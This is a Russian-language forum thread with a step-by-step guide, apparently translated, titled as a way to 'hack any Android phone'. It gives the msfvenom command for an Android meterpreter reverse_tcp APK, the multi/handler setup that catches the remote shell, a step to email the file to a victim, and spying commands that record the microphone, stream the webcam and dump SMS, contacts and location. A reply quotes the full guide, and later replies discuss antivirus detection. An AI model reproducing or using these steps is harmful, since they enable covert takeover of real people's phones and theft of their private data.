Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
Код: 
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.
Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).
Нажмите, чтобы раскрыть...
3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4. Запустите metasploit framework следующей командой
Код: 
root@kali:-# msfconsole
5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:
Код: 
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Запускается драйвер Payload……..
6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.
7. Воспользуйтесь следующими командами просмотра:
  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate
Что делать, если вылетает ошибка парсинга:
Код: 
Error fixing(incase you get PARSE ERROR)
Для исправления этой ошибки
Ссылка скрыта от гостей
signapk

После чего выполните следующие операции:
  1. Откройте папку «Signapk» и запустите расширение «cmd».
  2. Скопируйте «andro.apk» (созданное вами приложение) в папку Signapk.
  3. Введите следующую команду java -” jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk “в cmd (без двойных кавычек)
  4. Скопируйте на телефон и установите.
  5. Молимся чтобы сработало…
Перевод: Maryana Nazarenko
Источник:
Ссылка скрыта от гостей
 
  • Нравится
Реакции: removed, RealNapst3r, Demi и ещё 3
Нажмите, чтобы раскрыть...
toretto

toretto

Green Team
11.11.2019
30
4
BIT
37
The Codeby сказал(а):
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
Код: 
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.

3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4. Запустите metasploit framework следующей командой
Код: 
root@kali:-# msfconsole
5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:
Код: 
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Запускается драйвер Payload……..
6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.
7. Воспользуйтесь следующими командами просмотра:
  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate
Что делать, если вылетает ошибка парсинга:
Код: 
Error fixing(incase you get PARSE ERROR)
Для исправления этой ошибки
Ссылка скрыта от гостей
signapk

После чего выполните следующие операции:
  1. Откройте папку «Signapk» и запустите расширение «cmd».
  2. Скопируйте «andro.apk» (созданное вами приложение) в папку Signapk.
  3. Введите следующую команду java -” jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk “в cmd (без двойных кавычек)
  4. Скопируйте на телефон и установите.
  5. Молимся чтобы сработало…
Перевод: Maryana Nazarenko
Источник:
Ссылка скрыта от гостей
Нажмите, чтобы раскрыть...
аньтвирус палит хотел по мылу скинуть
 
MakeCool YT

MakeCool YT

Member
30.10.2020
7
0
BIT
0
Смысл?Даже андроид 4.1.1 палит эту херню только при открытии я уже не говорю про использование!И после перезапуска сразуже вырубаеться!!!
 
BELUGA

BELUGA

New member
20.05.2024
1
0
BIT
4
А что делать, если АПК файл 0 байт и не ставится на телефон?
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ